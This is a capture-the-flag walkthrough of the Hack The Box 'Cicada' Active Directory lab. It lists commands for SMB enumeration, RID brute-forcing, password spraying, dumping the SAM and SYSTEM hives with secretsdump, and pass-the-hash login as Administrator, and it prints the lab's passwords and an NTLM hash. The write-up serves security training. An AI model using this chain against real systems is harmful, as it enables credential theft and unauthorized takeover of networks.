Cicada HTB Walkthrough
Step 1: Initial Enumeration with Nmap
The first step in attacking Cicada HTB is performing an Nmap scan to identify open ports and running services.
sudo nmap -sV -sC -oA nmap/cicada 10.10.11.35
Nmap Results
The scan revealed several open ports, including:
- LDAP (389, 636, 3268, 3269)
- SMB (445)
- Kerberos (88)
- MSRPC (135, 593)
- DNS (53)
This indicates an Active Directory (AD) environment, which suggests possible attacks related to SMB, Kerberos, and LDAP.
Step 2: Enumerating SMB Shares
Next, we check for accessible SMB shares:
smbclient -N -L //10.10.11.35
Discovered Shares:
ADMIN$C$- DEV
- HR
NETLOGONSYSVOL
Step 3: Downloading HR Notices
Attempting to access the HR share without authentication:
smbclient //10.10.11.35/HR -U ""
get "Notice from HR.txt"
Inspecting the file:
cat Notice\ from\ HR.txt
This provides a default password:
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Step 4: Enumerate Users with SMB
Using NXC to enumerate all user RIDs:
nxc smb 10.10.11.35 -u '.' -p "" --rid-brute
Step 5: Password Spraying with CME
Using CrackMapExec (CME) to spray the default password across users:
cme smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
Success:
We discover the user michael.wrightson with valid credentials.
Step 6: Extracting User Descriptions
Using CrackMapExec to check user descriptions:
crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
This reveals another user’s password:
cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3
Step 7: Accessing the DEV Share
Using David’s credentials to explore the DEV share:
smbclient //10.10.11.35/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1
Step 8: Gaining a PowerShell Shell
The backup script reveals another password for Emily. Using Evil-WinRM to get a shell:
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
Inside the shell, navigate to the desktop and retrieve user.txt:
cd C:\Users\emily.oscars\Desktop
cat user.txt
Step 9: Extracting SYSTEM & SAM Files
To escalate privileges, dump the SAM & SYSTEM registry files:
reg save hklm\sam sam
reg save hklm\system system
Step 10: Dumping Admin Hash
Using impacket-secretsdump to retrieve NTLM hashes:
impacket-secretsdump -sam sam -system system local
The dump reveals the Administrator NTLM hash.
Step 11: Logging in as Administrator
Using Evil-WinRM with the extracted hash:
evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35
Once inside, retrieve root.txt:
cd C:\Users\Administrator\Desktop
cat root.txt
Conclusion
By leveraging SMB enumeration, password spraying, and privilege escalation, we successfully exploited the Cicada box and obtained both user and root flags. This demonstrates the importance of strong passwords, SMB hardening, and monitoring Active Directory environments for unauthorized access attempts.